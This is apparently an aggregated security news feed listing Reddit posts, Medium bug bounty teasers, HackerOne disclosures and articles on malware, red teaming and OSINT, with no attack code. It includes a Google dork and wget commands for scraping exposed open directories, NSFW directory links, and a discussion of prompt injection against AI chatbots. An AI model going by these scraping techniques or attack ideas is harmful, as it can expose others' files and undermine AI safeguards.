    For this first part, a series of actions will be carried out to identify possible security gaps in the lab environment, including… Continue reading on Medium »
  • Open

    Some NSFW ODs
    https://tokyokinky.com/blog/wp-content/uploads/ https://www.bdsmtw.com/wp-content/uploads/ submitted by /u/False-Celebration930 [link] [comments]
  • Open

    Qakbot begins using OneNote files for distribution
    OneNote files were rarely abused before, but attackers have recently begun to favor them. At first it was only small-scale malware attacks; now Qakbot has joined in as well.
    Hook: a new evolutionary branch of the Ermac banking trojan
    Researchers have already classified the Hook malware family as high-risk malware, and its appearance will further drive the spread of the Ermac family.

  • Open

    Data-backup against ransomware attacks defence
    What knowledge sources can provide information regarding protecting data backups against ransomware attacks as it concerns * state of the art * trends how it apparently is going to change short and middle term ? Addressed are those of organizational as well as technological domain measures delivering highest gain among all those practiced. submitted by /u/Biyeuy [link] [comments]
    Can you rate my security measures and perhaps suggest more
    First of all, before I bore you, apologies if this is not the right place. I'm extremely new to this, so if not, could you kindly point me in the right direction? Thanks. OK, so I've no real reason to be paranoid or anything, but I wanted a project and so I'm trying to live as reasonably securely as possible. With obvious things like not posting things online aside, how vulnerable am I from either attack, or from being traced? Here's the early-days system I'm hoping to get tips on: - Decoy main Windows install on a 1 TB SSD in the computer. No personal info, never used except to download a few ISOs. - Fully encrypted Linux Mint install on a USB drive that's regularly removed. This is the thing I'm concerned about securing. Mullvad VPN set up with lockdown mode + kill switch. Then I use virtual machines from within this and regularly delete/create them to cut down on just using one. Do these VMs add anything in between? I'm a total noob, so help, more relevant communities or documentation would all be greatly appreciated. submitted by /u/Middle-Chef5488 [link] [comments]
    How much can I interpret about TCP and UDP?
    Hey guys, I'm studying for CompTIA and some questions are related to TCP and UDP. They make some scenarios like "What if I got a lot of TCP packets in one direction, but empty in the other?" I'd like to know how you analyze this kind of protocol daily. For example, if you got a lot of TCP packets from an IP you don't trust, what would you look at? Also, when is it a good option to look at UDP packets and analyze them? If you have some idea of what I'm asking and you can further explain some scenarios, it would be very welcome. submitted by /u/MrNoodlesLearns [link] [comments]
    Too paranoid about firewall openings towards AWS?
    I work in a rather big company, and we are trying to increase the visibility in our AWS. Our IDS supplier has a module for it, but when the time for implementation came they asked us to open port 443 outbound to *.amazonaws.com from our IDS master in our datacenter. For me, that sounds like a huge risk. The supplier has made a big effort to tell me that this is best practice. So asknetsec, what is your take on this? submitted by /u/patsve123 [link] [comments]
    ELK for Security Engineers
    Hi, do you know any courses based on the topic "ELK for Security Engineers"? I know one cool course which I bought: https://www.networkdefense.io/library/elk-for-security-analysis-28074/about/ But I took it when there was the old ELK, and with the new 8.6 a lot has changed. For example, the appearance of the Elastic Agent; in many places the UI has been changed and an unprepared user needs additional effort to understand where to press the right button. Also, I found this https://georgebridgeman.com/ where this dude explains a lot of things about ELK, but not from a security perspective, which is not what I'm looking for, but it's interesting to listen to in order to better understand ELK. submitted by /u/athanielx [link] [comments]
    Difference between bytes wireshark and nfdump
    Just a general question that I'm stumped on. When opening this conversation in Wireshark and nfdump there is a difference between the bytes reported. Why is that so? https://imgur.com/a/EdUyXOg submitted by /u/reckless_boar [link] [comments]
    How to become a guru in Windows Security?
    Could you recommend any courses that are worth taking to understand more about cybersecurity in Windows? I want to gain the knowledge that will allow me to better organize and develop security in a Windows environment. Because right now, everything is rather chaotic and my knowledge of cybersecurity in Windows is selective. I am not interested in courses with a lot of dry information; I am more interested in knowledge where the lecturer shares some insights on what to do with this information and how to do it. My starting point is: https://learn.microsoft.com/en-us/certifications/browse/?roles=security-engineer&resource_type=certification I've taken courses there before, and they seemed pretty basic to me. It's not what I'm looking for. But maybe I'm wrong, because the sample is very small. submitted by /u/athanielx [link] [comments]
  • Open

    allintext Returns Nothing!?
    intext:"Search Term" intitle:"index.of./" (bmp|gif|jpg|png|psd|tif|tiff) -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) Very useful. But sometimes I don't have an EXACT phrase. But for the life of me, I cannot find any way to use allintext in this string and get results. Is there really no alternative to using intext for every single search term individually? submitted by /u/OHOLshoukanjuu [link] [comments]
    TV show theme songs
    https://www.quizmasters.biz/DB/Audio/Tv%20Themes/Mp3/ http://foto.teoteater.ee/muusika/all-time%20top%20100%20tv%20themes/ submitted by /u/Waste-Release-6235 [link] [comments]
    Are these wget downloads always around 100 kbps?
    Well, whenever I have to download I use [ wget -r -np -P F:\ ]. Is there any other command that can be used, or a way to improve the process? UPDATE: I changed the command and it kind of sped up to 500 kbps. I used [ wget -r -np -t 1 -A jpg,png,jpeg -P F:\ ], which helps with .html and .txt files not getting downloaded. jpg, png, jpeg are the file extensions I wanted to download; you can use any file extension you like to download from an OD, i.e. html, txt, gif, mp4, mp3, anything you want, and there is no space between the commas. submitted by /u/False-Celebration930 [link] [comments]
  • Open

    HubSpot Full Account Takeover in Bug Bounty
    Hi everybody, our story today will be about how I was able to get a Full account takeover on HubSpot Public Bug Bounty Program at Bugcrowd… Continue reading on Medium »
    Hacking skills and tools you should have
    1.Tamper Data 2.Hack Bar 3.Live HTTP headers 4.User-Agent Switcher 5.Flagfox 6.Domain Details 7.Cookie Manager+ 8.HttpFox 9.XSS Me… Continue reading on Medium »
    [BUG BOUNTY] SUBDOMAIN TAKEOVER IN TARGET CNAME GHOST.IO
    A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens… Continue reading on Medium »
    Bug Bounty Hunting 101: Falcon Recon.
    Hey Comrades, Continue reading on Medium »
    What is a Bug Bounty Program and how to Get Started by ChatGPT
    I have recently looked into bug bounty programs and decided I would write a blog, however I also wanted to have some fun with this and… Continue reading on Medium »
    Finding your first bug bounty booty!
    Introduction Continue reading on Medium »
    We Hacked GitHub for a Month
    Here’s What We Found Continue reading on Medium »
    Learning Web-Sec - Day 15 - Authentication Vulnerability
    Multi Factor Authentication Continue reading on System Weakness »
    What is bug bounty? And how to start?
    One of the most intriguing aspects of cybersecurity is the possibility for any freelancer to be involved in “bug bounties”. Continue reading on Medium »
    Bug Zero at a Glance [Week 04–10 February]
    What happened with Bug Zero? Continue reading on Bug Zero »
    XSS and SQL injection vulnerability and extraction of all important data
    Hello friends. I hope you are well, I am MR_NETWORK. Continue reading on Medium »
  • Open

    Sector035 | OSINT Quiz Guide
    So this write up for Sector035's challenge is going to be my first attempt at solving an OSINT quiz for the OSINT Dojo’s Student I badge… Continue reading on Medium »
    Wire, as we did it 20 years ago
    Olds will appreciate. Let’s talk today about the use of audio fixation tools during investigations… The following description is not a… Continue reading on Medium »
    Reverse Image Search: How to do it?
    Reverse image search is a technique that allows you to search the internet for similar images based on a sample image. This can be useful… Continue reading on Medium »
    APT Groups Introduction — Part I
    APT stands for Advanced Persistent Threat. It refers to a type of cyber attack carried out by a group of skilled hackers who are typically… Continue reading on System Weakness »
    Update v3 (Malaysian OSINT resource list)
    This update focus on licensed professional search and .my whois record Continue reading on Medium »
  • Open

    what is an IP address ?
    No content preview
    CyberVerse — Introducing a Cyber Security Community
    No content preview
    ChatGPT can boost your Threat Modeling skills
    Use ChatGPT to turbo-charge your cybersecurity processes Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2023-02-11 Review
    No news updates today~ For more of the latest articles, visit SecWiki
  • Open

    A tale of a full Business Takeover — Red Team Diaries
    This story is going to be about a Red Team engagement conducted on a big fashion brand that is owned and ran by a small family in India… Continue reading on InfoSec Write-ups »
    A tale of a full Business Takeover — Red Team Diaries
    This story is going to be about a Red Team engagement conducted on a big fashion brand that is owned and ran by a small family in India… Continue reading on Medium »
  • Open

    Summary, Analysis and Use of System Backdoor Techniques (Part 2)
    This article continues analyzing and using some backdoor techniques, in the hope of helping everyone's learning.
    The fun Hack-A-Sat satellite hacking challenge: the corrupted Apollo computer (Solution 1)
    This article describes the process of solving the Hack-A-Sat challenge “find the modified PI in the Apollo guidance computer” (apollo_gcm).
  • Open

    [Series] Offensive Wi-Fi Security
    submitted by /u/tbhaxor [link] [comments]
  • Open

    GitHub - dwisiswant0/gfx: A wrapper around grep, to help you grep for things! - Improved version of gf by @tomnomnom.
    submitted by /u/dwisiswant0 [link] [comments]
    Understanding auditd logs for threat hunting
    submitted by /u/InH4te [link] [comments]
    Active Malware Campaign Targeting Popular Python Packages Underway
    submitted by /u/louis11 [link] [comments]

  • Open

    CHFI
    I am studying for the CHFI exam, does anyone have any pointers and or study tips. submitted by /u/Snoo30695 [link] [comments]
  • Open

    FireFly : an advanced black-box fuzzer and not just a standard asset discovery tool
    submitted by /u/hisxo [link] [comments]
    New vuln in NTFS3 leads to DoS
    submitted by /u/jat0369 [link] [comments]
    Information disclosure to GDPR breach? A Google tale…
    submitted by /u/lukeberner [link] [comments]
    LocalPotato - When Swapping The Context Leads You To SYSTEM
    submitted by /u/splinter_code [link] [comments]
    #ShortAndMalicious — PikaBot and the Matanbuchus connection
    submitted by /u/OwnPreparation3424 [link] [comments]
    Find Writable Shares with Python.
    submitted by /u/oldboy21 [link] [comments]
    Cracking the Odd Case of Randomness in Java
    submitted by /u/Gallus [link] [comments]
    Found SaltStack on a network and don't know how to attack the thing? Check out how a few configuration issues and a new spin on Jinja template injections can undo a network managed by Salt
    submitted by /u/SkylightCyber [link] [comments]
    secpat2gf: convert secret patterns to gf compatible.
    submitted by /u/dwisiswant0 [link] [comments]
    Avalanche Blockchain Vulnerable to 0day DoS
    submitted by /u/endless [link] [comments]
  • Open

    Is there any way to download a video that doesn't let you right-click save, and the source is not in the element?
    submitted by /u/dudewithoneleg [link] [comments]
    Pokemon Misc
    This directory seems to contain plenty of Pokémon-related archives: doujin (SFW), fan art, illustration scans from manga in many languages, posters from the Pokémon TCG and even photos of the authors signing stuff. There is plenty here, I hope you enjoy. submitted by /u/math_001 [link] [comments]
    Found a directory with some doujinshi (not sure, but may have NSFW)
    Found it but didn't check all the zipped files; the one I checked seems to be SFW. http://manga.megchan.com/doujinshi/ submitted by /u/math_001 [link] [comments]
    Management applications for ISPs and providers
    submitted by /u/deadjdona [link] [comments]
  • Open

    Brooklyn Nine Nine TryHackMe Writeup | By Xploit Ayush
    No content preview
    Hydra TryHackMe Writeup | By Xploit Ayush
    No content preview
    STOCKER [HTB-EASY]
    No content preview
    ASSOCIATION RULE MINING
    No content preview
    WHEN CLUSTERING MEETS CYBER-SECURITY:
    No content preview
    How to test Exposed API Keys using Nuclei
    No content preview
    Discovering the Power of ChatGPT: My Experiences and Insights
    No content preview
    How I Was Able to Takeover User Accounts via CSRF on an E-Commerce Website
    No content preview
    Disabling js for the win
    Or how reading the HTML code with care led to RCE through file upload Continue reading on InfoSec Write-ups »
    XSS vulnerability
    No content preview
  • Open

    Information disclosure or GDPR breach? A Google tale…
    This is a vulnerability I reported back in April, 2022 Continue reading on Medium »
    How to Submit Bug Reports That Get Paid
    At Immunefi, we have a simple catchphrase: excellent bug reports lead to excellent payouts. Continue reading on Immunefi »
    How I got a $2000 bounty with RXSS
    Hi fellow hunters, in this write-up, I will explain how I found a reflected cross-site scripting bug and showed multiple attack scenarios. Continue reading on Medium »
    Bug Bounty — What is it?
    In recent years, several companies such as Microsoft, Google and Meta have offered rewards to anyone who finds vulnerabilities in their… Continue reading on Medium »
    Partnership Announcement: Credshields & Capture The Bug Join Forces to Offer Unmatched Security…
    We are thrilled to announce a new partnership between two of the leading companies in the security industry: Credshields and Capture The… Continue reading on Medium »
  • Open

    MS Sentinel - Teams channel notifications when assigning incident to a specific group
    Hi all. I'm trying to set up Teams notifications whenever I assign an incident to a group (a distribution group in Azure AD, I think). I know that I can set up an automation rule to run a playbook with a notification on the incident change trigger (owner change). However, I didn't find out how to trigger the notifications ONLY when the owner is that particular group. If I set it up like I described, every single owner change would produce a message in Teams, since you cannot filter on particular owners in the automation rule. Am I missing something? The playbook works fine; I just have to figure out how to trigger it only when the owner is that particular group. I'd be happy with any ideas you might have. Thank you! submitted by /u/FreakySeahorse
    Is it possible to detect if data is being replicated?
    Just curious (learning) if this can even be detected. Like when you hear about these large hacks, they seem to be replicating (?) company data to their own servers (like Sony, HBO, Experian, etc.). Is this something that can't be detected, since the hackers are on a VPN on their network or logged in as one of their users? submitted by /u/SmarterTogether
    Question about malware/virus spread
    If you had a compromised PC, is it possible for the malware to attach itself to executables or BIOS/firmware so that when you flash your BIOS it could get infected? Or is that really not possible, given that general malware couldn't possibly know how to exploit your firmware even if it attaches to it? (Adding meaningless data to your files that doesn't amount to anything even if you flash it.) submitted by /u/cloud12348
    Is it safe to house files in root folder of website?
    We host our company website on secure third-party servers, and I (web designer and site security novice) discovered we have a blank website on one of our subdomains, but realized we're hosting A TON of client deliverables and IP in the root folders that are being accessed by us and our clients through FileZilla. IT seems to be fine with it, but I've never heard of this practice in my line of work and have no idea if it's secure in the context of website management. Are there any recommended alternatives? Many clients have firewalls that block file sharing on Google, so this was apparently the solution. submitted by /u/Aware_Cheesecake_550
    Free software to replace Norton 360?
    Norton 360 has quite a bit to offer with its firewall, browser extension and malware database, but their pricing model is out of hand. These days, is there anything free that can offer the same amount of protection? Thank you submitted by /u/MattJaccino
    VPS Ports aren't being closed by firewall?
    I have an Ubuntu server on a Linode VM that I use as an endpoint for some of my services. I have ufw in place, and I only have it allow my SSH port, 80/443, and my Authelia port. I have Portainer running in a Docker container, and when I go to the IP and port of the VPS, even though I have that port set to deny, ufw is enabled and even after a reboot, I can still get to it. Is there something I'm doing wrong? The port shows open when I go to a port checker site, but `ufw status` shows it as dropped and the firewall enabled. submitted by /u/BelugaBilliam
  • Open

    Deserialized web security roundup: KeePass dismisses ‘vulnerability’ report
    Article URL: https://portswigger.net/daily-swig/deserialized-web-security-roundup-keepass-dismisses-vulnerability-report-openssl-gets-patched-and-reddit-admits-phishing-hack Comments URL: https://news.ycombinator.com/item?id=34741895 Points: 1 # Comments: 0
  • Open

    SecWiki News 2023-02-10 Review
    No news updated today. For more of the latest articles, visit SecWiki.
  • Open

    Cracking Passwords using John The Ripper
    John the Ripper is a password-cracking tool that can crack hundreds of hashes, ciphers, and even password-protected files. Continue reading on Medium »
  • Open

    ASAN
    Continue reading on Medium »
    Can sanitizers find the two bugs I wrote in C++? — Fuzzing Weekly CW6
    Can sanitizers find the two bugs I wrote in C++? https://ahelwer.ca/post/2023-02-07-cpp-bugs-sanitized/ Continue reading on Medium »
  • Open

    HackerOne Undisclosed Report Leak via PoC of Full Disclosure on Hacktivity
    HackerOne disclosed a bug submitted by syjane: https://hackerone.com/reports/1826141 - Bounty: $500
    Double forward slash breaks server-side restrictions & allows access to prohibited services from a partner account
    EXNESS disclosed a bug submitted by ashwarya: https://hackerone.com/reports/1829170 - Bounty: $200
    Desktop client can be tricked into opening/executing local files when clicking a nc://open/ link
    Nextcloud disclosed a bug submitted by lukasreschke: https://hackerone.com/reports/1720043 - Bounty: $750
    Jitsi Desktop Client RCE By Interacting with Malicious URL Schemes on Windows
    8x8 Bounty disclosed a bug submitted by ex0dus-0x: https://hackerone.com/reports/1692603 - Bounty: $777
    SSRF via filter bypass due to lax checking on IPs
    Nextcloud disclosed a bug submitted by obitorasu: https://hackerone.com/reports/1702864 - Bounty: $250
  • Open

    Can sanitizers find the two bugs I wrote in C++? – Fuzzing Weekly CW6
    Article URL: https://fuzzingweekly.medium.com/can-sanitizers-find-the-two-bugs-i-wrote-in-c-fuzzing-weekly-cw6-f85469e0d787 Comments URL: https://news.ycombinator.com/item?id=34738080 Points: 1 # Comments: 0
  • Open

    SlowMist: Unveiling the mystery of Monkey Drainer, the gang behind tens of millions of dollars in theft
    This article analyzes only some of the Monkey Drainer gang's phishing materials and phishing wallet addresses.
    FreeBuf Weekly | Rethinking CSMA; ChatGPT may bring new cyberattacks
    We have summarized and recommended this week's hot news, security incidents, good reads of the week and handy tools, so that nobody misses any of this week's highlights!
    Phishing site "lurking" in Google ads steals Amazon users' credentials
    A phishing campaign targeting Amazon Web Services (AWS) user login information hides its website in Google search results to steal users' login credentials.
    NIST announces ASCON as the encryption algorithm for IoT data protection
    The US National Institute of Standards and Technology (NIST) announced that the Ascon family of authenticated encryption and hashing algorithms will become the standard for lightweight cryptography applications.
    Matching core SIEM/SOC requirements; what is K8s actually good for? | FB enterprise group topic discussion
    A chat about the SIEM/SOC requirements security cannot do without, and how to view the claim that K8s is useless.
    Reddit hit by phishing attack; attackers gained internal access
    The attackers used a phishing lure aimed at Reddit employees, impersonating the landing page of its internal website to steal employee account credentials.
    As the API economy booms, F5 builds a new line of digital security defense
    APIs are also the foundation of enterprises' digital business; amid the wave of enterprise digital transformation, they have become the primary target of hackers and malicious attackers.

  • Open

    What is OSINT?
    OSINT is a process of gathering information from publicly available sources to be used in an intelligence context. In the digital age… Continue reading on Medium »
    O What??? How Open Source Intelligence Connects our World
    OSINT has become a bit of a buzzword, whilst becoming more blurred on whats actually classified as open source intelligence. Today we’ll… Continue reading on Medium »
    The Six Pillars of OSINT Documentation
    If you do any kind of online investigative or research work, then you’re no stranger to the rush of finding hidden information about your… Continue reading on The First Digit »
    The Six Pillars of OSINT Documentation
    If you do any kind of online investigative or research work, then you’re no stranger to the rush of finding hidden information about your… Continue reading on Medium »
    OSINT tools and techniques for conducting online research and data collection
    Open Source Intelligence (OSINT) has become a crucial aspect of modern investigations, providing valuable insights into the digital world… Continue reading on Medium »
  • Open

    Certified Red Team Professional (CRTP) discontinued
    Hello, I recently passed OSCP (go me, right?) and was disappointed to learn that the CRTP materials were no longer offered by Pentester Academy. This was the next item on my to-do list that is no longer an option. Does anyone have any information as to why it has been shut down? In addition, because it has been shut down, would anyone be willing to share the materials or their notes with me? I want to read the materials to learn and grow my skillset. Thank you. submitted by /u/tommyleeonetwothree
    Palo Alto Networks Cortex XDR Bypass (Updated for 2023)
    In this week's red team tip, I show how to bypass Palo Alto Networks Cortex XDR. Much of this was inspired by what mrd0x released last year. Some major changes in XDR have made many methods not opsec safe. They also added obfuscation to some of the values. https://youtu.be/f1z7wTnD4Z8 submitted by /u/Infosecsamurai
    Neo4jection: Secrets, Data, and Cloud Exploits - Attacking Neo4j
    submitted by /u/lowlandsmarch
  • Open

    Allow smtp server for users in a private network
    Do you have an authenticated SMTP server (port 587 or 465) accessible to everybody on your corporate network? Here we have one for server use only, but some users are asking to be able to use it in mail clients like Outlook or Thunderbird. Do you see any problems allowing that? Edit: it's a large corporate network. submitted by /u/PianoConcertoNo1
    Do Cloud Linux VMs require EDR, XDR?
    We are trying to implement an EDR or XDR solution with Microsoft 365 Defender or CrowdStrike Falcon Go. I never thought about the cloud environment, though. Is it a security practice to deploy agents on cloud EC2 instances (AWS in our case) running Linux? submitted by /u/chalreshammer12
    Junior Pen Tester - CTF interview
    Hi everybody. I am in the process of interviewing with a Big 4 company for a junior pen tester position. They asked me to have a technical interview in the form of a 3-hour-long CTF (Windows machine). Any recommendations on what to practice and where? Any recommended boxes on TryHackMe or HTB? PS: I am eJPT certified, and I know some stuff in general. I practice on THM a lot, but I still believe that I am just at the beginning. Thank you in advance submitted by /u/apostonikos
    Junior Pen Tester in UK
    Hi guys, I am based in Jersey, UK. Just passed Sec+, looking to start CREST CPSA then CRT. I have looked online for jobs, but there is not a lot out there for Junior Pen Tester and all the companies ask for experience. Any tips on how to land a job after passing CPSA then CRT with no experience? FYI I am on £45K per annum. Thanks in advance submitted by /u/CyberHero86
    I'm studying cyber resiliency and you can help!
    Hello fellow cybersecurity professionals! I'm a PhD candidate in the U.S. studying cybersecurity leadership, and my chosen topic of interest is cyber resiliency: the ability of a system to withstand negative effects and continue operating critical functions. In short (and in military terms), to take a hit and keep fighting. You can help with this important research! I am seeking participants for my online survey to better understand the innovation-decision process for cyber resiliency, and what influences affect adoption or rejection of cyber resiliency innovations at the organizational leadership level. Participants should be mid-to-senior level cybersecurity professionals with more than 5 years of field experience. The survey should take no longer than 15 minutes to complete (tested by pilot); you will remain anonymous. There's an option for a live interview at the end; please consider it, as it will help enrich the data collected! Link to the survey is here: https://www.surveymonkey.com/r/cyberstudy submitted by /u/hunter281
    Do you use in your daily tasks any script or something related to PowerShell?
    I'm a Mac and Linux user, so almost all the command lines and scripts I use are Unix-based. I'm learning the basics of PowerShell, and I'm trying to understand if I can involve this shell in my daily tasks. For example, I just know it has some commands homologous to those of the Command Prompt, something I used a long time ago and that isn't my strong suit, because, like I've said, I migrated to Mac and Linux 10 or more years ago. Now, for general study and research, I'm trying to understand if PowerShell is involved in something important or useful in NetSec. If you have some daily commands, or maybe some scripts on GitHub that you use daily, or something this shell lets you do more efficiently, please share with me. Thx! submitted by /u/MrNoodlesLearns
  • Open

    We had a security incident. Here’s what we know.
    submitted by /u/sanitybit
    Exploit Vector Analysis of Emerging 'ESXiArgs' Ransomware
    submitted by /u/DrinkMoreCodeMore
    Neo4jection: Secrets, Data, and Cloud Exploits - Attacking Neo4j
    submitted by /u/lowlandsmarch
    Offphish - Phishing revisited in 2023
    submitted by /u/0xcsandker
  • Open

    Making $500 by flipping a 0 to 1
    I recently found my first vulnerability in the wild. The vulnerability was a P1 and all I had to do was turn a 0 into a 1. Continue reading on InfoSec Write-ups »
    Bug Bounty Hunting 101, Js files Diving.
    Hello fellas, Continue reading on Medium »
    OSI Model Networking Fundamentals -Tryhackme.com Day 2
    Introductory Networking(OSI,Tools) Continue reading on Medium »
    SameSite Lax Bypass through Method Override | 2023
    Portswigger’s CSRF lab Simple Solution | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    8 Top tips to help you find SQLi
    Introduction Continue reading on Medium »
    Broken Access Control: Understanding and Finding Issues
    Broken access control can result in data breaches and security incidents. Find issues by performing threat modeling, security assessments… Continue reading on Medium »
    Pwning.eth Earns Third Whitehat Hall of Fame NFT
    Pwning.eth has earned a third Whitehat Hall of Fame NFT for his critical bug find in Moonbeam, Astar, and Acala on June 27, 2022. He… Continue reading on Immunefi »
    How to Get Into Bug Bounties?
    A common question nowadays is “How to get started in Bug Bounties?”. So, in this article, I’ll go over a beginner’s bug bounty guide. Continue reading on Medium »
    Fuzz Open Source, Get Paid by Google
    The OSS-Fuzz project by Google increased their rewards. How you earn: integrate OSS-Fuzz into a critical open source project and find bugs… Continue reading on Medium »
    How I got $$$$ Bounty within 5 mins
    Hi folks, Usually I don't do writeups or share anything related to bug bounty. From now I will be sharing my experience and knowledge &… Continue reading on Medium »
  • Open

    Some J-songs
    I found a folder full of music including Japanese songs. I was searching for J-songs and I actually found some, but when I clicked the Parent Directory link it seems that's actually a whole lot. This seems like a jackpot to me; I hope you guys can enjoy it. submitted by /u/math_001
  • Open

    DD raw vs E01?
    I'm doing an assignment and have to research the different types of forensic tools and the formats that they use. I'm getting conflicting reports on this, though. Are both DD and E01 raw formats? Or is DD the raw format and E01 the proprietary format? submitted by /u/Jumbofato
    No-brainer Mac imaging tool?
    What would be your tool of choice if you want to get the most accurate disk image suitable for analysis on a different computer (encryption stripped)? Imagine you do not have any commercial tools at hand, so you need to justify any new purchase. It would be perfect if the tool could preserve as many low-level filesystem artifacts as possible (otherwise I could just dmg/tar/rsync it, right?). AFF4 would be a plus, but not a requirement. submitted by /u/arkenoi
    Results of the Survey about Career
    So the results are published in a Google Doc here. Raw data can be seen here. If you want a CSV download link, lmk. I am currently cleaning up the Excel document to post if you want more raw data. There were 45 participants; it was a good test run. Will eventually want to make a better survey to try to reach a wider spectrum of DFIR down the road. Any fixes/suggestions/help is appreciated if you want to see a 2.0 version. I know location is a key factor that will need to be addressed. *Update with the raw data. Also, I don't know who downvoted this, but that will make it be seen by fewer people since it is a 0 now. So be it; I put some work into this but thought some people would like the results, so I posted it. submitted by /u/MDCDF
    Custom DFIR
    Hi guys, so as a part of my project I'm building a custom DFIR tool for various OSes. I'm writing a Python script for all operations. For Windows I was a little stuck trying to access the registry hives. So far I've tried using regipy and winreg, but I keep running into an error stating "permission denied". I read there is a way to access hives through the SYSTEM account, but I'm not sure how feasible that would be running it on a different system. Any help/insights are really appreciated. Thanks! submitted by /u/Advanced_Reaction596
  • Open

    SecWiki News 2023-02-09 Review
    Software Supply Chain Security: 2022 in Review by ourren; How to write a high-quality IEEE/ACM Transactions-level computer science paper? by ourren; ChatGPT research framework (80-page PPT) by ourren; The ChatGPT concept "goes wild" by ourren; A different way of thinking about intrusion detection by ourren; Overview of major cyberspace security projects in 2022 by ourren. For more of the latest articles, visit SecWiki.
  • Open

    No password length restriction in reset password endpoint
    Nextcloud disclosed a bug submitted by aditya404: https://hackerone.com/reports/1820864
  • Open

    Azure AD Kerberos Tickets: Pivoting to the Cloud
    If you’ve ever been doing an Internal Penetration test where you’ve reached Domain Admin status and you have a cloud presence, your entire Azure cloud can still be compromised. In this blog, I’ll take you through this scenario and show you the dangers of machine account SSO compromise. We will do so without extracting any... The post Azure AD Kerberos Tickets: Pivoting to the Cloud appeared first on TrustedSec.
  • Open

    CVE-2023–0759 /Privilege Escalation in the Cockpit CMS
    This vulnerability on version 2.3.6 and 2.3.7 (fixed in 2.3.8) Continue reading on Medium »
    Offphish — Phishing revisited in 2023
    What is the state of the art with phishing in 2023? What techniques do exist, which do still work and what is know-how worth revisiting? Continue reading on SSE Blog »
    Game Of Active Directory v2 [Spanish]
    GOAD is a lab focused purely on the world of Active Directory and offers multiple techniques to practice… Continue reading on Medium »
  • Open

    FreeBuf Morning Report | NIST standardizes the Ascon encryption algorithm; Anonymous leaks 128GB of data from a Russian operator
    NIST announced that the Ascon family of authenticated encryption and hashing algorithms will be standardized for lightweight cryptography applications.
    Latest | Excerpts of key views on cyberspace affairs work from provincial Party secretaries ("top leaders") nationwide (with list and résumés)
    This article compiles the latest list and résumés of 31 "top leaders" and excerpts of their key views on cyberspace affairs work.
    The three global social media giants suffer large-scale outages; Twitter hit by the largest outage in its 16-year history
    The world's three largest social media platforms suffered outages, with some users of Twitter, Instagram and YouTube unable to access their accounts.
    Attack-defense exercises: incident analysis and judgment
    Analysis and judgment techniques; cybersecurity attack types: brute force, XSS cross-site scripting, directory traversal, malicious communication, EternalBlue, ransomware, privilege escalation, SQL injection, file upload vulnerabilities, command injection, cryptomining malware, Log4j remote code execution; harms of cyberattacks: economic losses and business losses, hacker attacks
    SonicWall warns of "limitations" in Windows 11 security
    "Win11", touted as the best Windows system ever, announced that its first official release, 21H2, will gradually be phased out, and system users will be fully upgraded to 22H2.
    Google's Bard project stumbles; ChatGPT may bring new cyberattacks
    ChatGPT's success has made tech giants such as Microsoft and Google envious, and they are pouring in investment in an attempt to re-enter the game.
    Shadowsocks redirection attack
    I recently reproduced a fairly old vulnerability; since it involves a cryptography-related attack, and I happened to be studying communication protocols a while ago, I found it quite interesting.
  • Open

    Join the ExploitDev - MalwareDev - Reverse Engineering Discord Server!
    submitted by /u/xenonexi
  • Open

    Ask HN: Is “prompt injection” going to be a new common vulnerability?
    There was a post [0] recently about the Bing ChatGPT assistant either citing or hallucinating its own initial prompt from the (in theory) low-privileged chat input UI they put together. This feels like it's almost unavoidable if you let users actually chat with something like this. How would we sanitize strings now? I know OpenAI has banned topics they seem to regex for, but that's always going to miss something. Are we just screwed, and should we make sure chat bots just run in a proverbial sandbox and can't do anything themselves? [0] https://news.ycombinator.com/item?id=34717702 Comments URL: https://news.ycombinator.com/item?id=34719586 Points: 83 # Comments: 108
  • Open

    Analyzing an Old Netatalk dsi_writeinit Buffer Overflow Vulnerability in NETGEAR Router
    Author: cq674350529. This article is a contributed submission; Seebug Paper looks forward to your submissions, and every accepted one receives a gift! Submission email: paper@seebug.org. Preface: In November 2022, SSD published a vulnerability advisory related to the NETGEAR R7800 device. According to the advisory, the vulnerability exists in the Netatalk component (the corresponding service program is afpd): when processing received DSI packets, certain fields in the packet are not properly validated, and in ds...
  • Open

    11 Expert Tips to Succeed in Bug Bounty
    My last, first article, published here after years of silent reading, received such a positive response I decided to create a more… Continue reading on Medium »
    Burrow Partners with ImmuneFi, Offering Up to $250K in Bug Bounties
    Burrow is proud to announce its new bug bounty program with ImmuneFi, aimed at identifying and fixing potential vulnerabilities in the… Continue reading on Medium »
    Some useful Bug Bounty platforms to start your journey
    HackerOne Continue reading on Medium »
    Hacking XML — XML Injection
    Introduction Continue reading on Martian Defense Cybersecurity »
    Reflected XSS on Target with tough WAF ( WAF Bypass )
    I was doing web pentesting on a private program. The program had a very tough WAF; even typing alert as a payload would be blocked by… Continue reading on Medium »
    Chaining Bugs to get my First Bug Bounty
    Openredirection + clickjacking + csrf -> Account Takeover Continue reading on InfoSec Write-ups »
    Introduction to Offensive Security-Try Hack me Day 1
    Dear readers, I’m delighted to report that I’ve begun a 100-day challenge at THM to learn more about the topic of cyber security. I’m also… Continue reading on Medium »
  • Open

    Boot camps
    I've been recently thinking about doing a bootcamp for cyber security. Not sure if this is the place for this, but I wanted to get some advice on how bootcamps are perceived in the industry. It's backed by UofM and I will have about 400 hrs of hands-on experience at the end with decent certs; just not sure if not having a degree will keep me from getting a job. Anyone got any insight? submitted by /u/Runnit_son
    How do you conduct security assessments and audits of privileged accounts in Windows?
    What are your personal checklists, perhaps scripts? For example, whether there are admin accounts that have not been used for a long time, whether passwords have been changed in admin accounts, or whether this user really needs to be in a privileged group. P.S. I'm not talking about continuous monitoring of account activity. submitted by /u/athanielx
    Strange TLS handshakes with my public IP in the SNI field
    Hi, I'm running my personal VPN/proxy on a cloud server and I noticed multiple failed TLS handshakes with my server's public IP in the SNI field in my Caddy logs! Is this normal or is it some kind of attack? submitted by /u/__HumbleBee__
  • Open

    What is Google Dorking, and why is it useful?
    Google Dorking is a technique used by security researchers and hackers to find vulnerable information and websites by using advanced… Continue reading on Medium »
    What is OSINT? Here is the explanation
    Open Source Intelligence (OSINT). OSINT is the process of gathering information from publicly available sources to be used in… Continue reading on Medium »
    Exploring the dark side of Shodan
    Exploring the smoking gun of the Internet — Shodan Continue reading on Medium »
    Bots for looking up information by phone number
    Modern technologies provide many opportunities for automating various processes, including information lookup. One… Continue reading on Medium »
